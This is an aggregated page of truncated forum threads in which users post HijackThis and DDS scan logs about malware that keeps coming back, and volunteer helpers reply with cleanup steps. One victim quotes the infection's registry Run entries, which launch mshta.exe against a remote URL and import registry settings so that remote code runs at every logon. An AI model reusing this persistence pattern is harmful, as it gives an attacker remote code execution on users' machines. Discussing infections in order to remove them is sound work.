C:\WINDOWS\System32\atiptaxx.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\WINDOWS\System32\devldr32.exe
C:\WINDOWS\System32\ZoneLabs\isafe.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:... Read more

Answer:Web Hijacker keeps coming back

Hi ucurl

Has this system been rebooted since you posted this Hijack log?

If so, please post a new log.
 

1 more replies
Relevance 48.79%

I have these same bugs everytime i run spybot, how do i permanently eliminate them, and what is a good firefox extension for cookie control.
 

Answer:Same spyware coming back

 

3 more replies
Relevance 48.79%

It's not just Browsers now, Steam as well, it shows up the adware and every time i click something i opens a new tab with more adware.
 

More replies
Relevance 48.79%

Hi - I recently got infected with a virus that added options to my toolbar (Fresh Search) which I managed to fix thanks to the help I saw posted here, but I still keep getting pop-ups and infections - SearchToolbar, Spyware.Msnagent and DownLoader.Trojan being the most recent. None of the anti-spyware, pop-up blockers or anti virus programs I have can stop the reinfections.

I have gone into safe made, used CWShredder, CClean, Kill2Me, HSRemove and Stinger. Also RAVAntivirus online scan, Bitdefender online scan, AdAware SEplus and Norton Antivrus. I used Silent Runners and found some suspect entries, which I edited out of the registry using Registrar Lite, and I used Hijack This to find and fix some other suspicious entries.

But they all keep coming back, in one form or another. Not crippling like before, but really annoying!

Below is a recent Silent Runners report, followed by a HiJack This report:


"Silent Runners.vbs", revision 40.1, http://www.silentrunners.org/
Operating System: Windows 2000
Output limited to non-default values, except where indicated by "{++}"
Startup items buried in registry:
---------------------------------

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ {++}
"internat.exe" = "internat.exe" [MS]
"NvMediaCenter" = "RUNDLL32.EXE D:\WINNT\System32\NVMCTRAY.DLL,NvTaskbarInit" [MS]
"NBJ" = ""D:\Program Files\Ahead\Nero BackItUp\NBJ.exe"" ["Ahead So... Read more

Answer:Virus Keeps Coming Back

16 more replies
Relevance 48.79%

DDS (Ver_09-07-30.01) - NTFSx86 NETWORK
Run by Michael at 19:00:59.98 on Sun 09/06/2009
Internet Explorer: 8.0.6001.18813
Microsoft? Windows Vista? Home Basic 6.0.6002.2.1252.1.1033.18.765.240 [GMT -7:00]

AV: Protection System *On-access scanning enabled* (Outdated) {28e00e3b-806e-4533-925c-f4c3d79514b9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\Windows\System32\vds.exe
C:\Windows\Explorer.EXE
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\PROGRA~1\mcafee.com\ag... Read more

Answer:virus keeps coming back help!

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Relevance 48.79%

Hopefully I've included enough information and made this topic correctly...
 
Basically I had an issue where my microphone would mute itself, figured it was a virus, and ran malwarebytes. It found stuff, removed it, and everything worked fine... for about a few hours. A few hours later the same thing occurred, ran malwarebytes again and found the same thing: "dnsl64.exe" detected, along with other things that it appears to be downloading. No matter how many times I remove it it seems to come back, and googling dnsl64.exe popped up no results that I could find and then each scan (after a few hours) pops up a bunch of junk, even if I leave the computer idle. It also downloaded something that appeared to change my browser homepage to "search.snapdo.c*m" if that helps diagnose anything.
 
I've attached the MWB and FRST logs, hopefully they help diagnose what the problem is! Thank you in advance for any help, would really appreciate getting rid of this nasty thing.

More replies
Relevance 48.79%

Hi -- my computer has been infected with several trojans that keep coming back even after I've repeated removed them by performing scans with numerous antivirus/antispyware programs. Please help!! Please see the highjackthis log below (I've also run combofix, but the log is REALLY long):

Logfile of HijackThis v1.99.1
Scan saved at 10:53:44 PM, on 10/23/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\wltrysvc.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\WINDOWS\System32\bcmwltry.exe
C:\Program Files\Java\jre1.5.0_03\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_A10IC2.EXE
C:\Program Files\Skype\Phone\Sk... Read more

More replies
Relevance 48.79%

Woke up 2 days ago and my comp was infested. Spywares, adwares, trojans, etc. Spent the last 2 days trying to clean it myself so here I am now pleading for help.

So far i've used the online scanners(probably 2-3 of them), lavasoft's adaware, spybot search and destroy, super anti spyware, repeat and rinse.

Its not as bad now. Im still getting pop ups etc. Used SpyHunter to scan and heres whats left supposably...
IE Defender
SmitFraud
Starware
WinActive
SearchExplorerBar
Activity Monitor

Heres my HJT Log. Hopefully this can help those who can help me.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:35:52 AM, on 12/16/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Creative\SBLive\AudioHQ\AHQTB.EXE
C:\Program Files\McAfee.co... Read more

Answer:Help Please! Spyware etc keeps coming back!

Spent the last 3 days cleaning, scanning and cleaning my comp again. Spywares, Adwares, Malwares, Trojans and even Viruses keeps coming back.

Some of them seems to just come back... I've removed(hopefully) vundo, js/psyne(spellcheck?), random trojans, hacking tools etc.

Right now AdAware is seeing Win32.Spyware.Acoona and Bargain Buddy. I could of swore I've removed everything when I used SD Fix.
-------------------
Heres my HJT Log....

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:23:44 PM, on 12/17/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\WINDOWS\System32\wdfmgr.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\Creative\... Read more

2 more replies
Relevance 48.79%

Hi,

Having a problem with my laptop (64bit, Windows 7), A pop up always comes up during startup to a webpage and only has a close button. Ending mshta.exe in task manager seems to close it temporarily, but comes back after a few minutes. I've also noticed two (hidden) folders which are related to this under C:\Users, as i've not created these folders myself. One folder with an exe file called mshost.exe, a systemboot shortcut. The other with a RegWrite folder with the target: C:\Windows\System32\mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ
and also a registry file which has the following:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemBootSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/reg2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="mshta.exe http://mrwiq.info/set_inf2.php?cccid=SCksjDDymdz0PiqvcwiQawJb8dH194dJ"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"RegWriteSCksjDDymdz0PiqvcwiQawJb8dH194dJ"="REG IMPORT C:/Users/Vincent/SoftRecovery/datSCksjDDymdz0PiqvcwiQawJb8dH194dJ.reg"

Tried deleting the folders and ran Malwarebytes, it seemed to have picked up the folders as malware, but after removing/deleting them it just comes back after reboot
I've als... Read more

Answer:Pop up on desktop that keeps coming back

Hello and Welcome to Bleeping Computer!!My name is Gringo and I'll be glad to help you with your computer problems.I have put together somethings for you to keep in mind while I am helping you to make things go easier and faster for both of usPlease do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.NOTE: At t... Read more

13 more replies
Relevance 48.79%

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.Do not run any other tool untill instructed to do so!Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.For x64 bit systems download Farbar Recovery Scan Tool x64 and save it to a flash drive. Plug the flashdrive into the infected PC. Enter System Recovery Options. To enter System Recovery Options from the Advanced Boot Options: Restart the computer. As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears. Use the arrow keys to select the Repair your computer menu item. Select US as the keyboard language settings, and then click Next. Select the operating system you want to repair, and then click Next. Select your user account an click Next. To enter System Recovery Options by using Windows installation disc: Insert the ... Read more

Answer:consrv.dll keeps coming back

The forum said that the post was too long when I tried to paste it in, so I just attached the log file.

14 more replies
Relevance 48.79%

I am running on Windows2000 and have tried what MFDnSC advised another user and did this yesterday:

"Fix these with HJT
O4 - HKLM\..\Run: [Windows Service] C:\WINDOWS\system32\prvdi.exe
O4 - HKCU\..\Run: [Windows Service] C:\WINDOWS\system32\prvdi.exe"

but today, these files show up again. Also, McAfee reports deleting dload.exe once every few hours. It does not find any virus, though.

I also tried:
Sophos SAV32CLI
Xoft Spy
SpyBot
AdAware SE

I also looked at windows and system32 entries, win.ini and system.ini, but nothing in there.

This is how my HJT log looks like after I have deleted the two prvdi.exe today:

Logfile of HijackThis v1.99.0
Scan saved at 13:27:51, on 01/31/2005
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\SYSTEM32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\tp4mon.exe
C:\PROGRA~1\COMMON~1\PCSuite\DATALA~1\DATALA~1.EXE
C:\WINNT\system32\WLANSTA.EXE
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\PROGRA~1\COMMON~1\PCSuite\Services\SERVIC~1.EX... Read more

Answer:Downloader-ME keeps coming back

You have to delete the file in safe mode AND

START RUN key in %temp% - Edit Select all File Delete

AS it is running out of the temp dir - C:\DOCUME~1\MARTIN~1\LOCALS~1\Temp\prvdi.exe
 

3 more replies
Relevance 48.79%

Hello,

I believe I have a variation of the Zero Access Rootkit. It creates a file consrv.dll in the system32 directory. Hitmanpro has detected it and has tried to remove it, but it keeps reappearing.
Other symptoms have included the loss of internet connection (removing McAfee has resolved that issue). The windows firewall and service is completely missing and I have not been able to restore it. If left alone the system becomes unstable and I am forced to do a restore just to get it to boot.
I am running Windows 7 Home Prem 64 bit.
I have run the following without success Superantispyware, Malwarebytes, Spybot, rootkitbuster, Sophos, TDSSKiller, Kaspersky Rescue disk and a few others. All without success

I have attached the log files from DDS adn GMER. Although on GMER it would not let me check off most items (boxes were greyed out, I suspect it was because of the 64 bit OS).

I'm running out of ideas.... help...

Thanks,

Larry

Answer:Another zero access.... just keeps coming back...

Hi Larry! My secret agent name on the forums is SweetTech (you can call me Agent ST for short), it's a pleasure to meet you. I would be glad to take a look at your log and help you with solving any malware problems.If you have since resolved the issues you were originally experiencing, or have received help elsewhere, please inform me so that this topic can be closed. If you have not, please adhere to the guidelines below and then follow instructions as outlined further below:Logs from malware removal programs (OTL is one of them) can take some time to analyze. I need you to be patient while I analyze any logs you post. Please remember, I am a volunteer, and I do have a life outside of these forums.
Please make sure to carefully read any instruction that I give you. Attention to detail is important! Since I cannot see or directly interact with your computer I am dependent on you to "be my eyes" and provide as much information as you can regarding the current state of your computer.
If you're not sure, or if something unexpected happens, do NOT continue! Stop and ask!
In Windows Vista and Windows 7, all tools need to be started by right clicking and selecting Run as Administrator!
If I instruct you to download a specific tool in which you already have, please delete the copy that you have and re-download the tool. The reason I ask you to do this is because these tools are updated fairly regularly.
... Read more

7 more replies
Relevance 48.79%

my USB keeps geting infected ith fooool.exe i use the Flash_disinfector provided by you guys but it keeps geting infected, i scanned with Superantispyware and it didn;t find it though it is there, i tried avast and it didnt find it too.

Any tool to remove it?

I can see Fooool.exe when i run a Live Linux ditrubution and chek what's on my USB stick, anyways i know it is there because my USB stick keeps geting infected and when i open its Autorun.inf the open command refers to fooool.exe .

Help plz!!

Answer:Fooool.exe Keeps Coming Back

I did a quick search and it seems that fooool.exe is related to explorer.exe that i posted about earlier that some anti viruses were locating it as a virus and i thought back than that they are detecting the legitimate one.

anyways i still need help on how to remove this infection.

4 more replies
Relevance 48.79%

I've been getting the Win 7 Antivirus problem every few days lately. I can run a scan with mbam and kill it, but it keeps returning.Any advice?Heres a hijackthis log:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:48:46 PM, on 1/2/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SavService.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files (x86)\Sophos\AutoUpdate\ALMon.exe
C:\Program Files (x86)\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files (x86)\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files (x86)\Sophos\Sophos Anti-Virus\Web Intelligence\swi_service.exe
C:\Program Files\VMware\VMware View\Client\bin\wsnm.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files (x86)\Notepad++\notepad++.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Mozilla Firefox\plugin-container.exe
C:\Program Files\... Read more

Answer:Win 7 Antivirus keeps coming back

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/435844 <<< CLICK THIS LINK If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.*************************************************** If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Relevance 48.79%

A week ago I got the Win 7 Antispyware virus. I ran a system restore to 3 days earlier, and for a while the computer ran normally. Then, 3 nights ago, the virus came back. Now, even if I do a system restore, the virus comes back in a day (interestingly always around 1-2 AM). It usually begins with a window popping up saying Adobe needs to update, even if I try to exit out of the screen, it just pops up again. Then right after the Win 7 virus activates.

.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 1.6.0_26
Run by avkuznet at 14:52:30 on 2011-12-17
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8182.5222 [GMT -5:00]
.
AV: Trend Micro OfficeScan Antivirus *Enabled/Updated* {7193B549-236F-55EE-9AEC-F65279E59A92}
SP: Trend Micro OfficeScan Anti-spyware *Enabled/Updated* {CAF254AD-0555-5A60-A05C-CD200262D02F}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program File... Read more

Answer:Win 7 AntiSpyware Keeps coming back.

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. To help Bleeping Computer better assist you please perform the following steps:*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/433026 <<< CLICK THIS LINK If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.*************************************************** If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lo... Read more

2 more replies
Relevance 48.79%

I don't seem to be able to remove this persistent spyware by any means. It always sneaks back.

This is what my HijackThis log looks like:

Logfile of HijackThis v1.99.0
Scan saved at 21:58:28, on 7.1.2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\system32\slserv.exe
C:\WINDOWS\System32\STDSB.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Google\Gmail Notifier\G001-1.0.24.0\gnotify.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\PROGRA~1\COMMON~1\PCSuite\DATALA~1\DATALA~1.EXE
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\COMMON~1\PCSuite\Services\SERVIC~1.EXE
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\PC\Dokumenty\My Downloads\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,... Read more

Answer:ISTSVC keeps coming back

Fix these

O4 - HKLM\..\Run: [DMeFD0nZr] C:\WINDOWS\isgeem.exe

O23 - Service: SmartLinkService - Unknown - slserv.exe (file missing)
O23 - Service: ZESOFT - Unknown - C:\WINDOWS\zeta.exe (file missing)

Boot to safe mode and delete C:\WINDOWS\isgeem.exe

Boot and post a new log
 

1 more replies
Relevance 48.79%

For the past couple weeks or so my computer has been infected. They've been all sorts of different viruses and Norton Antivirus 2006 scans, finds them, and removes them but they keep coming back. I tried doing a system restore to about 2 months ago and the problem didnt resolve itself. I've also tried using Roguescanfix and smitRem to no avail. My computer is running windows XP media center edition if that helps
Any help is appreciated. thanks

Answer:Viruses Keep Coming Back

Welcome to bleepingcomputer slicktrick689Let's try this before we go to HiJackThisRun the NAV again then do the following as you may be reinstalling the virus.Empty your Recycle Bin.NextUpdate your windows Windows UpdateNextCreate a new Restore Point:Go to Start > All Programs > Accessories > System Tools > System RestoreThen when Restore opens, select Create a new restore point and click NextGive the the restore point a name like New and clean >Click CreateThen delete old Restore points:Go to Start > All Programs > Accessories > System Tools > Disk Cleanup > Click Ok. Click the more options tab > notice System Restore > click clean up >Reboot A little extra protectionNow install SpywareBlaster 3.5.1 . QUOTEPrevent the installation of ActiveX-based spyware, adware, browser hijackers, dialers, and other potentially unwanted software. Block spyware/tracking cookies in Internet Explorer and Mozilla/Firefox. Restrict the actions of potentially unwanted sites in Internet Explorer. SpywareBlaster can help keep your system spyware-free and secure, without interfering with the "good side" of the web. update weekly

1 more replies
Relevance 48.79%

They're called Error Cleaner, Privacy Protector, and Spyware&Malware protection

But I know they're viruses because pop ups continually come up with them on, and they won't delete... Help please!
HijackThis log:
Logfile of HijackThis v1.99.1
Scan saved at 10:47:39 AM, on 12/26/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeperUI.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\Program Files\Webroot\Spy Sweeper\SSU.EXE
C:\Documents and Settings\SCULL\Desktop\HijackThis.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Alwil Software\Avast4\setup\avast.setu... Read more

Answer::( These three programs keep coming back...

Download SDFix and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)

Please then reboot your computer in Safe Mode by doing the following :
Restart your computer
After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
Instead of Windows loading as normal, the Advanced Options Menu should appear;
Select the first option, to run Windows in Safe Mode, then press Enter.
Choose your usual account.

Open the extracted SDFix folder and double click RunThis.bat to start the script.
Type Y to begin the cleanup process.
It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
Press any Key and it will restart the PC.
When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
(Report.txt will also be copied to Clipboard ready for posting back on the forum).
Finally paste the contents of the Report.txt back on the forum with a new Hijack This log

 

1 more replies
Relevance 48.79%

As the title says, whenever i start my PC, the language bar (rightclick on the taskbar->toolbars->languagebar) comes back. I can make it go away, but i have to do that everytime i start my PC...

any ideas?
 

Answer:Language bar keeps coming back- Xp Pro x64

control panel > regional & language options > languages tab > text services and input > details > pref > language bar > deselect the "show the language bar"

iirc, been a while sorry
 

2 more replies
Relevance 48.79%

I have something called clspring. Everrytime I run a virus scan it comes up. Furthermore it keeps reinstalling itself. It appears to connect to something called www.outerinfo.com. Popups usualy say http://c5.zedo.com. It has all but stopped my computer. How do i get rid of it for good? HiJack this log below.

Edit by chaslang: Inline log removed
 

Answer:clspring keeps coming back

Welcome to Majorgeeks!

Please do not post any logs inline with messages!

Please follow our standard cleaning procedures which are necessary for us to provide you support. Also there are steps included for installing, running, and posting HijackThis logs as attachments.

Run ALL the steps in this Sticky thread READ & RUN ME FIRST Before Asking for Support
Make sure you check version numbers and get all updates.
Very Important: Make sure you tell us the results from running the tutorial...was anything found? Were you unable to complete any of the scans?...Were you unable to download any of the tools?...Did you do the on-line scans as suggested? etc.

After doing ALL of the above you still have a problem make sure you have booted to normal mode and run the steps in the below link to properly use HijackThis and attach a log:
